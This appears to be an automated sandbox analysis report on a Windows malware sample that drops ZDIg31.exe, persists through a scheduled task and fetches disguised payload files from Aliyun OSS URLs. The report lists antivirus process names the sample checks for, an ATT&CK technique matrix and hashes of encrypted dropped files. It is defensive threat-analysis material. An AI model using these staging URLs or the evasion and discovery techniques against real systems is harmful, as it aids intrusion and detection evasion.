Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,6_2_00000001400042B0
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,6_2_0000000140003F80
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
Service Execution
24
Windows Service
1
Access Token Manipulation
31
Masquerading
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Credential API Hooking
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
24
Windows Service
1
Virtualization/Sandbox Evasion
LSASS Memory13
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Process Injection
1
Access Token Manipulation
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Abuse Elevation Control Mechanism
1
Process Injection
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSync123
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
2976587-987347589.08.exe17%VirustotalBrowse
2976587-987347589.08.exe5%ReversingLabs
SourceDetectionScannerLabelLink
C:\Users\user\Documents\ZDIg31.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://662hfg.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
39.103.20.105
truefalse
    unknown
    662hfg.oss-cn-beijing.aliyuncs.com
    unknown
    unknownfalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://662hfg.oss-cn-beijing.aliyuncs.com/a.giffalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/s.jpgfalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/b.giffalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/s.datfalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/i.datfalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/c.giffalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/d.giffalse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://crl.thawte.com/ThawteTimestampingCA.crl0189atohci.sys.0.dr, ZDIg31.exe.0.drfalse
        high
        http://www.symauth.com/cps0(ZDIg31.exe.0.drfalse
          high
          http://www.symauth.com/rpa00ZDIg31.exe.0.drfalse
            high
            http://ocsp.thawte.com0189atohci.sys.0.dr, ZDIg31.exe.0.drfalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              39.103.20.105
              sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comChina
              37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
              Joe Sandbox version:42.0.0 Malachite
              Analysis ID:1588718
              Start date and time:2025-01-11 04:35:27 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 56s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:7
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:2976587-987347589.08.exe
              Detection:MAL
              Classification:mal80.evad.winEXE@2/12@1/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 74%
              • Number of executed functions: 6
              • Number of non-executed functions: 104
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 20.12.23.50
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              04:38:07Task SchedulerRun new task: CiPRa path: C:\Users\user\Documents\ZDIg31.exe
              22:36:23API Interceptor941x Sleep call for process: 2976587-987347589.08.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              39.103.20.1052976587-987347589.07.exeGet hashmaliciousUnknownBrowse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com2976587-987347589.07.exeGet hashmaliciousUnknownBrowse
                • 39.103.20.105
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd2976587-987347589.07.exeGet hashmaliciousUnknownBrowse
                • 39.103.20.105
                5.elfGet hashmaliciousUnknownBrowse
                • 139.240.73.120
                4.elfGet hashmaliciousUnknownBrowse
                • 42.120.233.253
                AuKUol8SPU.exeGet hashmaliciousFormBookBrowse
                • 8.136.96.106
                frosty.x86.elfGet hashmaliciousMiraiBrowse
                • 47.110.90.76
                3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                • 8.136.96.106
                beacon_x86.exeGet hashmaliciousCobaltStrikeBrowse
                • 8.148.6.140
                beacon_x86.exeGet hashmaliciousCobaltStrikeBrowse
                • 8.148.6.140
                beacon_x64.exeGet hashmaliciousCobaltStrikeBrowse
                • 8.148.6.140
                2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                • 118.178.60.103
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                37f463bf4616ecd445d4a1937da06e192976587-987347589.07.exeGet hashmaliciousUnknownBrowse
                • 39.103.20.105
                yMXFgPOdf2.exeGet hashmaliciousGuLoaderBrowse
                • 39.103.20.105
                02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • 39.103.20.105
                LMSxhK1u8Z.exeGet hashmaliciousGuLoaderBrowse
                • 39.103.20.105
                ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                • 39.103.20.105
                ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                • 39.103.20.105
                4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                • 39.103.20.105
                ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                • 39.103.20.105
                YrCSUX2O3I.exeGet hashmaliciousGuLoaderBrowse
                • 39.103.20.105
                4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                • 39.103.20.105
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\Documents\ZDIg31.exe2976587-987347589.07.exeGet hashmaliciousUnknownBrowse
                  2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                    2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                      2362476847-83854387.07.exeGet hashmaliciousUnknownBrowse
                        2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                          2o63254452-763487230.06.exeGet hashmaliciousUnknownBrowse
                            e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                              e2664726330-76546233.05.exeGet hashmaliciousUnknownBrowse
                                23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                                  287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                    Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):3892010
                                    Entropy (8bit):7.995495589600101
                                    Encrypted:true
                                    SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                    MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                    SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                    SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                    SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                    Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):135589
                                    Entropy (8bit):7.995304392539578
                                    Encrypted:true
                                    SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                    MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                    SHA1:561836F6228E24180238DF9456707A2443C5795C
                                    SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                    SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                    Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):28272
                                    Entropy (8bit):7.711609753705466
                                    Encrypted:false
                                    SSDEEP:384:9HegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQV:A5F1FUdy422IK+gAZt2i0YPpQn4GMm
                                    MD5:896C42E1561CA189DF0DC3F97D59BC62
                                    SHA1:8ED4B65EFEFFC052F66FFD00DBE8FE208AA8F14F
                                    SHA-256:7C15263B27AAE1DA378BFE114E6E5C3FA2A9A9D28BCFC9D000C9AE746BEBC95E
                                    SHA-512:BB9DE4835886300195571E8D93D49D162B5209F09A84B26A22B7C59E8EA9D7295514A60C01AF1EA61D37AEBD30967F2A4F729814E2318A890696C30911769C10
                                    Malicious:false
                                    Reputation:low
                                    Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                                    Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):125333
                                    Entropy (8bit):7.993522712936246
                                    Encrypted:true
                                    SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                    MD5:2CA9F4AB0970AA58989D66D9458F8701
                                    SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                    SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                    SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                    Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                    Category:dropped
                                    Size (bytes):8299
                                    Entropy (8bit):7.9354275320361545
                                    Encrypted:false
                                    SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                    MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                    SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                    SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                    SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                    Malicious:false
                                    Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............
                                    Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):10681
                                    Entropy (8bit):7.866148090449211
                                    Encrypted:false
                                    SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                    MD5:10A818386411EE834D99AE6B7B68BE71
                                    SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                    SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                    SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                    Malicious:false
                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                    Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):5.186642107139491
                                    Encrypted:false
                                    SSDEEP:6:WcSRpdRdbCrCa2BIDR+syYWRudduXCCA7OdUzW9E40/qcX:URpiMBIDRNyYWRudduXCCigUzWg3
                                    MD5:A1CC6E3DD3069453BEF8913F9698C666
                                    SHA1:2A3E6F584700A78F1C1691238F9673CBCA8084FD
                                    SHA-256:4BF6D36A529FD1214D07E344298AF465AA7D764CA2BDBBA4B3D7C070B3CE25F9
                                    SHA-512:76A43622E6FDF6DE22F3EAC452F378C809FC28B84CA76774818BD8ACD9C2AC352085BE0F721B661978B0B98A4B87AEBC8C4ED6815C48FC271992094EE75BE57D
                                    Malicious:false
                                    Preview:....l%00...X>?v7DD.T:y61X[X_8q>3ZJF]>.s>QS._q86999999999999999999999999999999999QMMI:sffPPT.hi a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33...[=<u4GG.W9z52[X[\;r=0YIE^=-p=RP.^p97888888888888888888888888888888888PLLH;rggQQU.ih!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll
                                    Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                    File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):3889557
                                    Entropy (8bit):7.999938757431662
                                    Encrypted:true
                                    SSDEEP:98304:QAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:7ndLOZS/DtpPJRO8OHBL4f2UQI+A
                                    MD5:EF99C0391AC0E72A356FE84F161E6577
                                    SHA1:C2EEC4EF403125F6AB90AF8D81D785EB34E6072E
                                    SHA-256:69688697B7F7F09CD61FF82279E190D6939061253903B3EC4A4D5E5CC191BA26
                                    SHA-512:446798A49C2DD96DE808005770702AE3C0F81D328582C77234E08AD10CCDAA3B63DB4942B56D9C1F791BDF6E508C78FB821B202D73C1A634BD8BCA5F6F6BD955
                                    Malicious:false
                                    Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Qo.K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                    Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                    File Type:GIF image data, version 89a, 10 x 10
                                    Category:dropped
                                    Size (bytes):8228
                                    Entropy (8bit):7.978918825319935
                                    Encrypted:false
                                    SSDEEP:192:dBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:dBuNhyTlBU2dp+1XrBuCgp9vU0l
                                    MD5:6C080CA12C743137B52A263185421FEE
                                    SHA1:B012ACBBFBF5911D227A21CDA342C17300BD379B
                                    SHA-256:82D49EFF062D49B17FF953666EC21C544DF431DBCDF5477A674A5E7970F7A0EE
                                    SHA-512:7CAC48EC7D599D0110249CC727DD381ECB45E0482C2205083A4D1299976DF14B386078235A7B14D908F990BBEADAB4E065092BDDD4B7761A44F5DACCE3801F7B
                                    Malicious:false
